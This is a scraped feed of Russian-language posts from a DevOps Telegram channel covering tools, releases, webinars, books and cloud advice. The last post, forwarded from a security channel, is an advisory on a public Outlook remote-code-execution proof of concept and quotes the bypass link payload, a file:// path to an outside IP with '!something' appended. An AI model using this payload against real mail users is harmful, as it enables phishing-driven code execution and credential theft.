Это наше сердечко, когда вы получаете годный контент, лайкаете наши посты и делитесь ими ❤️
С любовью, @DevOpsKaz
С любовью, @DevOpsKaz
❤58
С Nix Shell вы cможете мгновенно создать именно ту среду, которая нужна — она будет адаптирована к конкретным проектам. От нее также легко отказаться, как только вы закончите.
🤔 Создатели продукта обещают — теперь не понадобится никаких контейнеров! Но в комментах на YouTube пишут более честно:
По традиции предлагаем использовать Яндекс Браузер со встроенным синхронным переводчиком (если надо).
#devops #nix #k8s #kubernetes
@DevOpsKaz
🤔 Создатели продукта обещают — теперь не понадобится никаких контейнеров! Но в комментах на YouTube пишут более честно:
Использую Nix для хоста (серверов, рабочей станции), среды разработки и контейнеров. Но не для развертывания за пределами одного хоста.
По традиции предлагаем использовать Яндекс Браузер со встроенным синхронным переводчиком (если надо).
#devops #nix #k8s #kubernetes
@DevOpsKaz
YouTube
Say Goodbye to Containers - Ephemeral Environments with Nix Shell
With Nix Shell, you can instantly spin up the exact environment you need, tailored to specific projects, and discard it with ease once you're done. No containers!
We'll walk you through the installation of Nix and various ways to craft custom environments…
We'll walk you through the installation of Nix and various ways to craft custom environments…
👍3❤2⚡2🔥2👾2
Главная фишка релиза — GitLab Duo Chat , который теперь доступен для клиентов Premium SaaS и клиентов с самостоятельным управлением. Узнайте, что это за зверь такой во второй карточке 👆
В новой версии также появилась возможность запрашивать изменения в мерж-реквесте без блокировки мерж, улучшили удобство страницы переменных CI/CD, дали больше возможностей автоотмены конвейеров и многое другое.
Познакомьтесь с релизом здесь и поделитесь с коллегами 🤝
#devops #gitlab #gitlab169
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥4⚡2❤2😎2
Компания WeaveWorks обанкротилась и сделала бесплатным свой проект Weave GitOps. Это мощное расширение Flux, ведущего движка GitOps и проекта CNCF.
Weave GitOps предоставляет аналитику о развертывании приложений и упрощает внедрение и масштабирование непрерывной доставки.
В этом репозитории представлены компоненты уровня enterprise для продукта weave-gitops, включая создание кластера CAPI и командных рабочих пространств.
Забирайте себе и делитесь с коллегами 🤝
#devops #git #gitops #weaveworks
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍5⚡4❤2👾2
Продолжаем делиться опытом через книги.
👉 Сегодня это — Облачные технологии. Практическое руководство по созданию инновационных приложений
Эта книга представляет собой руководство по разработке приложений с использованием облачных технологий: от базовых концепций облачных вычислений до передовых методик и стратегий оптимизации.
Читатели получат углубленное понимание моделей облачных вычислений, архитектуры облачных приложений и эффективного использования облачных сервисов и ресурсов.
Книга акцентирует внимание на вопросах безопасности в облачных средах и предлагает конкретные рекомендации по управлению доступом, шифрованию данных и мониторингу безопасности.
Читайте и делитесь с коллегами 🤝
#devops #devopsbooks
@DevOpsKaz
👉 Сегодня это — Облачные технологии. Практическое руководство по созданию инновационных приложений
Эта книга представляет собой руководство по разработке приложений с использованием облачных технологий: от базовых концепций облачных вычислений до передовых методик и стратегий оптимизации.
Читатели получат углубленное понимание моделей облачных вычислений, архитектуры облачных приложений и эффективного использования облачных сервисов и ресурсов.
Книга акцентирует внимание на вопросах безопасности в облачных средах и предлагает конкретные рекомендации по управлению доступом, шифрованию данных и мониторингу безопасности.
Читайте и делитесь с коллегами 🤝
#devops #devopsbooks
@DevOpsKaz
❤9👍5🔥5⚡2
Infisical позволяет синхронизировать секреты в вашей команде/инфраструктуре и предотвратите утечку секретов.
Этим контентом поделился наш подписчик. Не забывайте делиться своими наработками, новостями или другим 🤝
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13❤3⚡3👍3👾2
😱 Компания обещает снизить зависимость разработчиков от SRE-инженеров, DevOps и экспертов по инфраструктуре. А всё потому, что компания полагает: сегодняшние инструменты наблюдения не предназначены для разработчиков.
Информационные панели сложны, перегружены и предоставляют некоррелированную визуализацию данных. А еще требуют 100% участия человека 😃
Что думаете по этому поводу? Пишите в комменты 👇🏼
#devops #sre #observability
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🤡9🔥6⚡2❤2👾2
Задача — настроить оповещение в Slack о нагрузках базы данных. Арман Нургалиев, эксперт и Cloud Architect в Core 24/7 не нашел идеального ответа, как это сделать с помощью стандартных инструментов.
Поэтому он нашел собственное решение и описал инструкцию в статье.
👉 Читайте подробнее, ставьте лайки и делитесь с коллегами
#slack #cloud #awsrds #prometheus #aws
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤5👍4⚡2🤡2
👉 Смотрите здесь. 3,5 тысячи лайков, между прочим
Вас проведут через полную настройку конвейера, подробно описав каждый шаг:
• установка и настройка Jenkins с TLS для безопасной связи
• установка и настройка Sonarqube с TLS для статического анализа кода и проверок качества • создание и отправка контейнеров Docker в Docker Hub, используя возможности контейнеризации для беспрепятственного развертывания • использование ArgoCD для непрерывного развертывания образа DockerПо традиции предлагаем использовать Яндекс Браузер со встроенным синхронным переводчиком.
#devops #kubernetes #jenkins #cicd #docker
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7❤5👍5⚡3
28 февраля, Ср
Вебинар «Как выбрать IT-инфраструктуру для e-commerce: кейс Uzum Nasiya»
Приглашаем на бесплатный вебинар, посвященный выбору IT-инфраструктуры для e-commerce проектов. Суннат Шамуратов, директор по развитию бизнеса Servercore, расскажет, как решать задачи рынка онлайн-коммерции с помощью продуктов облачной платформы.
Приглашенный спикер Сардорбек Байахмедов, руководитель проектного офиса Uzum Nasiya, поделится опытом миграции IT-инфраструктуры в облако Servercore.
В программе:
— Тренды рынка 2024 и ключевые цифры e-commerce.
— Какие бизнес-задачи стоят перед проектами онлайн-коммерции.
— IT-инфраструктура для решения задач в электронной коммерции.
— Кейс компании Uzum Nasiya: как компания целиком перенесла IT-инфраструктуру в Servercore за 1 месяц.
🔺 Новые участники получат 15 000 тенге для тестирования сервисов.
Регистрируйтесь на вебинар по ссылке.
Вебинар «Как выбрать IT-инфраструктуру для e-commerce: кейс Uzum Nasiya»
Приглашаем на бесплатный вебинар, посвященный выбору IT-инфраструктуры для e-commerce проектов. Суннат Шамуратов, директор по развитию бизнеса Servercore, расскажет, как решать задачи рынка онлайн-коммерции с помощью продуктов облачной платформы.
Приглашенный спикер Сардорбек Байахмедов, руководитель проектного офиса Uzum Nasiya, поделится опытом миграции IT-инфраструктуры в облако Servercore.
В программе:
— Тренды рынка 2024 и ключевые цифры e-commerce.
— Какие бизнес-задачи стоят перед проектами онлайн-коммерции.
— IT-инфраструктура для решения задач в электронной коммерции.
— Кейс компании Uzum Nasiya: как компания целиком перенесла IT-инфраструктуру в Servercore за 1 месяц.
🔺 Новые участники получат 15 000 тенге для тестирования сервисов.
Регистрируйтесь на вебинар по ссылке.
👍4⚡2👎2🔥2
Спикер вебинара — опытный Golang-разработчик Алексей.
🙋🏼♂️Алексей не просто пишет код, а создаёт настоящие произведения искусства. У него за плечами множество проектов, включая микросервисные решения, цифровой тенге и блокчейн.
В программе вебинара:
🔸 Введение в многопоточность Golang
🔹 Механизмы синхронизации го-рутин на практике
🔸 Работа с микросервисами
🔹 Возможность задать вопросы опытному разработчику
👉 Подключайтесь в пятницу, 23 февраля, в 19:00 по Астане
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥6❤2
Есть и теория, и практика, но экзамен придется сдавать отдельно.
Также для тех, кто не выиграл в прошлом конкурсе, могут пригодятся скидочки 50% от Linux Foundation.
👉 Забирайте здесь и делитесь с коллегами
#kubernetes #cks #k8s #devops
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥6👾4🤡2
This media is not supported in your browser
VIEW IN TELEGRAM
Понедельник начинается не с кофе 🤣
А если серьезно — многие считают, что Kubernetes сложен из-за экосистемы интегрируемых инструментов, но на деле — благодаря этому он и полезен.
Поделитесь в комментах, какую интеграцию в Kubernetes вы считаете самой эффективной 👇🏼
@DevOpsKaz
А если серьезно — многие считают, что Kubernetes сложен из-за экосистемы интегрируемых инструментов, но на деле — благодаря этому он и полезен.
Поделитесь в комментах, какую интеграцию в Kubernetes вы считаете самой эффективной 👇🏼
@DevOpsKaz
👍9🤣7❤4🔥2👾2
Компания VMware призвала администраторов удалить устаревший аутентификационный плагин VMware Enhanced Authentication Plug-in (EAP). Он подвержен атакам типа authentication relay, а также перехвату сессий из-за двух неисправленных уязвимостей.
«Злоумышленник может вынудить пользователя домена с установленным в браузере EAP запрашивать и передавать сервисные билеты для произвольных Active Directory Service Principal Names (SPN). Также атакующий с непривилегированным локальным доступом может перехватить привилегированный сеанс EAP».
Чтобы удалить или отключить EAP, нужно выполнить ряд PowerShell-команд — вот инструкция.
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤2🔥2👾2
Они упрощают задачу, шаг за шагом помогая выполнить упражнения, предоставляя наборы данных, примеры команд и терминал, где можно проверить результат.
Пользуйтесь и делитесь с коллегами 🤝
#devops #postgresql #sql #database #db
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21👍7❤3⚡3👾2
Многие новые проекты стараются с самого начала использовать облачные технологии, но когда бизнес требует быстрой миграции большого количества приложений, организации предпочитают переносить их как есть. Например, компания GE Oil & Gas, выявила, что даже без внедрения каких-либо облачных оптимизаций она может сэкономить около 30% своих затрат за счет рехостинга.
Вы можете сделать несколько облачных оптимизаций, чтобы получить выгоду, но в остальном вы не меняете основную архитектуру приложения. Например, вы хотите сократить количество времени, которое тратите на управление экземплярами баз данных.
Чаще всего мы видим (repurchasing) как переход на SaaS платформу. Переход CRM на Salesforce.com, HR-системы на Workday, CMS на Drupal и так далее.
Переосмысление архитектуры и разработки приложения, как правило, с использованием нативных облачных (cloud-native) функций. Вызвано потребностью бизнеса в добавлении новых функций, масштабировании или увеличении производительности.
До 20% корпоративного портфеля приложений больше не используются и их можно просто отключить. Такая экономия может повысить эффективность бизнеса, направив высвободившиеся бюджет другим командам.
Обычно это означает «пересмотреть» или ничего не делать (пока что). Вы должны переносить только то, что имеет смысл для бизнеса.
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥5❤2👾2
Узнайте о тенденциях оптимизации затрат Kubernetes, устраните разрыв между выделением ресурсов и фактическим использованием ЦП/памяти в 4 000 кластерах и получите практические советы, как избежать излишних затрат.
👉 Отчёт основан на анализе 4 000 кластеров, работающих на AWS, Azure и GCP с 1 января по 31 декабря 2023 года до их оптимизации.
#devops #aws #k8s #kubernetes #azure #gcp
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤4🔥3
Forwarded from Делаем IT
Большая онлайн-встреча с лидерами веб и мобильного рынка пройдет уже сегодня🔖
Обсудим, с какими проблемами мы столкнулись в 2023 году и какие строим планы по развитию на 2024 год.
Подключайтесь в 18:00 по ссылке 🔗
Участники:
— Иван Клюкин СЕО из Synaptik
— Анатолий Дубенчак СЕО из Пиксель Плюс
— CEО Дима Юрин, Делаем IT
— СЕО Александр Комбаров из Пиробайта
— Вячеслав Кислицын СЕО из Reactive
— Дима Балыкин Сo-founder из Сedro
Приглашенный эксперт: Петр Федюшкин — Директор Partners’ Club by AGIMA
Обсудим, с какими проблемами мы столкнулись в 2023 году и какие строим планы по развитию на 2024 год.
Подключайтесь в 18:00 по ссылке 🔗
Участники:
— Иван Клюкин СЕО из Synaptik
— Анатолий Дубенчак СЕО из Пиксель Плюс
— CEО Дима Юрин, Делаем IT
— СЕО Александр Комбаров из Пиробайта
— Вячеслав Кислицын СЕО из Reactive
— Дима Балыкин Сo-founder из Сedro
Приглашенный эксперт: Петр Федюшкин — Директор Partners’ Club by AGIMA
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3❤2⚡2
Forwarded from 3side кибербезопасности
Публичный эксплойт на критическую уязвимость Microsoft Outlook
Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!
Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point:
От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.
Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!
Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.
Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
GitHub
GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Microsoft-Outlook-Remote-Code-Execution-Vulnerability - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
🔥9👍6❤3